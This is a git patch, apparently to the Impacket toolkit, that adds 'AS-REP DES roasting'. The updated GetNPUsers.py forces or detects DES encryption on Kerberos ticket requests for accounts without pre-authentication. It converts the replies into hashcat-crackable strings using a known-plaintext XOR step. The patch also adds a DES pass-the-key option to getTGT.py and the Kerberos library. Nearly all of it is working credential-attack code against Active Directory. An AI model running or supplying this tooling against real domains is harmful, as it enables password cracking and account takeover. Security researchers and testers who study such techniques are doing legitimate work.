From cc9ce8723652bbf2a24fd5a988e27aacf132635d Mon Sep 17 00:00:00 2001 From: parzel Date: Mon, 7 Jul 2025 11:35:25 +0200 Subject: [PATCH] implemented asrep desroasting --- examples/GetNPUsers.py | 68 +++++++++++++++++++++++++++++-------- examples/getTGT.py | 7 +++- impacket/krb5/kerberosv5.py | 23 +++++++++---- 3 files changed, 77 insertions(+), 21 deletions(-) diff --git a/examples/GetNPUsers.py b/examples/GetNPUsers.py index 7b76fa8e71..fb03474dba 100755 --- a/examples/GetNPUsers.py +++ b/examples/GetNPUsers.py @@ -39,7 +39,7 @@ from pyasn1.type.univ import noValue from impacket import version -from impacket.dcerpc.v5.samr import UF_ACCOUNTDISABLE, UF_DONT_REQUIRE_PREAUTH +from impacket.dcerpc.v5.samr import UF_ACCOUNTDISABLE, UF_DONT_REQUIRE_PREAUTH, UF_USE_DES_KEY_ONLY from impacket.examples import logger from impacket.examples.utils import parse_identity, ldap_login from impacket.krb5 import constants @@ -84,6 +84,7 @@ def __init__(self, username, password, domain, cmdLineOptions): #[!] in this script the value of -dc-ip option is self.__kdcIP and the value of -dc-host option is self.__kdcHost self.__kdcIP = cmdLineOptions.dc_ip self.__kdcHost = cmdLineOptions.dc_host + self.__useDES = cmdLineOptions.force_des if cmdLineOptions.hashes is not None: self.__lmhash, self.__nthash = cmdLineOptions.hashes.split(':') @@ -101,7 +102,25 @@ def getUnixTime(t): t /= 10000000 return t - def getTGT(self, userName, requestPAC=True): + def formDESHash(self, stCipherHex, domain): + """ + Form DES hash for hashcat cracking format + Based on Rubeus implementation + """ + # Calculate known plaintext based on domain length + wholeLength = 193 + (len(domain) * 2) + knownPlain = bytes([0x79, 0x81, wholeLength & 0xFF, 0x30, 0x81, (wholeLength - 3) & 0xFF, 0xA0, 0x13]) + + # Extract IV and first block from cipher hex + IV = bytes.fromhex(stCipherHex[32:48]) # 16 hex chars = 8 bytes + firstBlock = bytes.fromhex(stCipherHex[48:64]) # 16 hex chars = 8 bytes + + # XOR IV with known plaintext + xoredIV = bytes(knownPlain[i] ^ IV[i] for i in range(8)) + + return f"{firstBlock.hex()}:{xoredIV.hex()}" + + def getTGT(self, userName, requestPAC=True, useDES=False): clientName = Principal(userName, type=constants.PrincipalNameType.NT_PRINCIPAL.value) @@ -143,7 +162,10 @@ def getTGT(self, userName, requestPAC=True): reqBody['rtime'] = KerberosTime.to_asn1(now) reqBody['nonce'] = random.getrandbits(31) - supportedCiphers = (int(constants.EncryptionTypes.rc4_hmac.value),) + if useDES: + supportedCiphers = (int(constants.EncryptionTypes.des_cbc_md5.value),) + else: + supportedCiphers = (int(constants.EncryptionTypes.rc4_hmac.value),) seq_set_iter(reqBody, 'etype', supportedCiphers) @@ -175,6 +197,9 @@ def getTGT(self, userName, requestPAC=True): # Let's output the TGT enc-part/cipher in John format, in case somebody wants to use it. if self.__outputFormat == 'john': + # Check if DES - not supported in John format + if asRep['enc-part']['etype'] == 3: # DES + raise Exception('DES not supported for john format, please rerun with --format hashcat') # Check what type of encryption is used for the enc-part data # This will inform how the hash output needs to be formatted if asRep['enc-part']['etype'] == 17 or asRep['enc-part']['etype'] == 18: @@ -190,7 +215,9 @@ def getTGT(self, userName, requestPAC=True): else: # Check what type of encryption is used for the enc-part data # This will inform how the hash output needs to be formatted - if asRep['enc-part']['etype'] == 17 or asRep['enc-part']['etype'] == 18: + if asRep['enc-part']['etype'] == 3: # DES + return self.formDESHash(hexlify(asRep['enc-part']['cipher'].asOctets()).decode(), domain) + elif asRep['enc-part']['etype'] == 17 or asRep['enc-part']['etype'] == 18: return '$krb5asrep$%d$%s$%s$%s$%s' % (asRep['enc-part']['etype'], clientName, domain, hexlify(asRep['enc-part']['cipher'].asOctets()[-12:]).decode(), hexlify(asRep['enc-part']['cipher'].asOctets()[:-12]).decode()) @@ -214,7 +241,7 @@ def run(self): if self.__doKerberos is False and self.__no_pass is True: # Yes, just ask the TGT and exit logging.info('Getting TGT for %s' % self.__username) - entry = self.getTGT(self.__username) + entry = self.getTGT(self.__username, useDES=self.__useDES) self.outputTGT(entry, None) return @@ -227,7 +254,7 @@ def run(self): if str(e).find('strongerAuthRequired') < 0: # Cannot authenticate, we will try to get this users' TGT (hoping it has PreAuth disabled) logging.info('Cannot authenticate %s, getting its TGT' % self.__username) - entry = self.getTGT(self.__username) + entry = self.getTGT(self.__username, useDES=self.__useDES) self.outputTGT(entry, None) return @@ -271,13 +298,19 @@ def run(self): pwdLastSet = '' userAccountControl = 0 lastLogon = 'N/A' + supportsDES = False try: for attribute in item['attributes']: if str(attribute['type']) == 'sAMAccountName': sAMAccountName = str(attribute['vals'][0]) mustCommit = True elif str(attribute['type']) == 'userAccountControl': - userAccountControl = "0x%x" % int(attribute['vals'][0]) + uacValue = int(attribute['vals'][0]) + userAccountControl = "0x%x" % uacValue + # Check if user supports DES + if (uacValue & UF_USE_DES_KEY_ONLY) != 0: + supportsDES = True + logging.info('User %s supports DES!' % sAMAccountName) elif str(attribute['type']) == 'memberOf': memberOf = str(attribute['vals'][0]) elif str(attribute['type']) == 'pwdLastSet': @@ -291,7 +324,9 @@ def run(self): else: lastLogon = str(datetime.datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0]))))) if mustCommit is True: - answers.append([sAMAccountName,memberOf, pwdLastSet, lastLogon, userAccountControl]) + # Use DES if user supports it OR if force-des is enabled + useDES = supportsDES or self.__useDES + answers.append([sAMAccountName,memberOf, pwdLastSet, lastLogon, userAccountControl, useDES]) except Exception as e: logging.debug("Exception:", exc_info=True) logging.error('Skipping item, cannot process due to error %s' % str(e)) @@ -302,8 +337,9 @@ def run(self): print('\n\n') if self.__requestTGT is True: - usernames = [answer[0] for answer in answers] - self.request_multiple_TGTs(usernames) + # Create list of tuples (username, supportsDES) + user_info = [(answer[0], answer[5]) for answer in answers] + self.request_multiple_TGTs(user_info) else: print("No entries found!") @@ -312,16 +348,18 @@ def request_users_file_TGTs(self): with open(self.__usersFile) as fi: usernames = [line.strip() for line in fi] - self.request_multiple_TGTs(usernames) + # For file-based users, use force-des flag since we can't query LDAP + user_info = [(username, self.__useDES) for username in usernames] + self.request_multiple_TGTs(user_info) - def request_multiple_TGTs(self, usernames): + def request_multiple_TGTs(self, user_info): if self.__outputFileName is not None: fd = open(self.__outputFileName, 'w+') else: fd = None - for username in usernames: + for username, supportsDES in user_info: try: - entry = self.getTGT(username) + entry = self.getTGT(username, useDES=supportsDES) self.outputTGT(entry, fd) except Exception as e: logging.error('%s' % str(e)) @@ -347,6 +385,8 @@ def request_multiple_TGTs(self, usernames): help='format to save the AS_REQ of users without pre-authentication. Default is hashcat') parser.add_argument('-usersfile', help='File with user per line to test') + parser.add_argument('-force-des', action='store_true', default=False, help='Force DES encryption for all users (useful for testing)') + parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output') parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON') diff --git a/examples/getTGT.py b/examples/getTGT.py index 4601adfe06..a3f772d615 100755 --- a/examples/getTGT.py +++ b/examples/getTGT.py @@ -42,6 +42,7 @@ def __init__(self, target, password, domain, options): self.__lmhash = '' self.__nthash = '' self.__aesKey = options.aesKey + self.__desKey = options.desKey self.__options = options self.__kdcHost = options.dc_ip self.__service = options.service @@ -64,6 +65,7 @@ def run(self): lmhash = unhexlify(self.__lmhash), nthash = unhexlify(self.__nthash), aesKey = self.__aesKey, + desKey = self.__desKey, kdcHost = self.__kdcHost, serverName = self.__service) self.saveTicket(tgt,oldSessionKey) @@ -86,6 +88,8 @@ def run(self): 'ones specified in the command line') group.add_argument('-aesKey', action="store", metavar = "hex key", help='AES key to use for Kerberos Authentication ' '(128 or 256 bits)') + group.add_argument('-desKey', action="store", metavar = "hex key", help='DES key to use for Kerberos Authentication ' + '(56 bits)') group.add_argument('-dc-ip', action='store',metavar = "ip address", help='IP Address of the domain controller. If ' 'ommited it use the domain part (FQDN) specified in the target parameter') group.add_argument('-service', action='store', metavar="SPN", help='Request a Service Ticket directly through an AS-REQ') @@ -95,7 +99,8 @@ def run(self): parser.print_help() print("\nExamples: ") print("\t./getTGT.py -hashes lm:nt contoso.com/user\n") - print("\tit will use the lm:nt hashes for authentication. If you don't specify them, a password will be asked") + print("\t./getTGT.py -desKey 1234567890abcdef contoso.com/user\n") + print("\tit will use the lm:nt hashes or DES key for authentication. If you don't specify them, a password will be asked") sys.exit(1) options = parser.parse_args() diff --git a/impacket/krb5/kerberosv5.py b/impacket/krb5/kerberosv5.py index 7f45b4dc36..bbbb69169c 100644 --- a/impacket/krb5/kerberosv5.py +++ b/impacket/krb5/kerberosv5.py @@ -94,7 +94,7 @@ def sendReceive(data, host, kdcHost, port=88): return r -def getKerberosTGT(clientName, password, domain, lmhash, nthash, aesKey='', kdcHost=None, requestPAC=True, serverName=None, kerberoast_no_preauth=False): +def getKerberosTGT(clientName, password, domain, lmhash, nthash, aesKey='', desKey='', kdcHost=None, requestPAC=True, serverName=None, kerberoast_no_preauth=False): # Convert to binary form, just in case we're receiving strings if isinstance(lmhash, str): @@ -112,6 +112,11 @@ def getKerberosTGT(clientName, password, domain, lmhash, nthash, aesKey='', kdcH aesKey = unhexlify(aesKey) except TypeError: pass + if isinstance(desKey, str): + try: + desKey = unhexlify(desKey) + except TypeError: + pass if serverName is not None and not isinstance(serverName, Principal): try: serverName = Principal(serverName, type=constants.PrincipalNameType.NT_PRINCIPAL.value) @@ -163,6 +168,8 @@ def getKerberosTGT(clientName, password, domain, lmhash, nthash, aesKey='', kdcH # Yes.. this shouldn't happen but it's inherited from the past if aesKey is None: aesKey = b'' + if desKey is None: + desKey = b'' if nthash == b'': # This is still confusing. I thought KDC_ERR_ETYPE_NOSUPP was enough, @@ -171,7 +178,9 @@ def getKerberosTGT(clientName, password, domain, lmhash, nthash, aesKey='', kdcH # So, in order to support more than one cypher, I'm setting aes first # since most of the systems would accept it. If we're lucky and # KDC_ERR_ETYPE_NOSUPP is returned, we will later try rc4. - if aesKey != b'': + if desKey != b'': + supportedCiphers = (int(constants.EncryptionTypes.des_cbc_md5.value),) + elif aesKey != b'': if len(aesKey) == 32: supportedCiphers = (int(constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value),) else: @@ -251,11 +260,13 @@ def getKerberosTGT(clientName, password, domain, lmhash, nthash, aesKey='', kdcH cipher = _enctype_table[enctype] - # Pass the hash/aes key :P + # Pass the hash/aes/des key :P if isinstance(nthash, bytes) and nthash != b'': key = Key(cipher.enctype, nthash) elif aesKey != b'': key = Key(cipher.enctype, aesKey) + elif desKey != b'': + key = Key(cipher.enctype, desKey) else: key = cipher.string_to_key(password, encryptionTypesData[enctype], None) @@ -323,11 +334,11 @@ def getKerberosTGT(clientName, password, domain, lmhash, nthash, aesKey='', kdcH tgt = sendReceive(encoder.encode(asReq), domain, kdcHost) except Exception as e: if str(e).find('KDC_ERR_ETYPE_NOSUPP') >= 0: - if lmhash == b'' and nthash == b'' and (aesKey == b'' or aesKey is None): + if lmhash == b'' and nthash == b'' and (aesKey == b'' or aesKey is None) and (desKey == b'' or desKey is None): from impacket.ntlm import compute_lmhash, compute_nthash lmhash = compute_lmhash(password) nthash = compute_nthash(password) - return getKerberosTGT(clientName, password, domain, lmhash, nthash, aesKey, kdcHost, requestPAC) + return getKerberosTGT(clientName, password, domain, lmhash, nthash, aesKey, desKey, kdcHost, requestPAC) raise @@ -568,7 +579,7 @@ def getKerberosType1(username, password, domain, lmhash, nthash, aesKey='', TGT if TGT is None: if TGS is None: try: - tgt, cipher, oldSessionKey, sessionKey = getKerberosTGT(userName, password, domain, lmhash, nthash, aesKey, kdcHost) + tgt, cipher, oldSessionKey, sessionKey = getKerberosTGT(userName, password, domain, lmhash, nthash, aesKey, '', kdcHost) except KerberosError as e: if e.getErrorCode() == constants.ErrorCodes.KDC_ERR_ETYPE_NOSUPP.value: # We might face this if the target does not support AES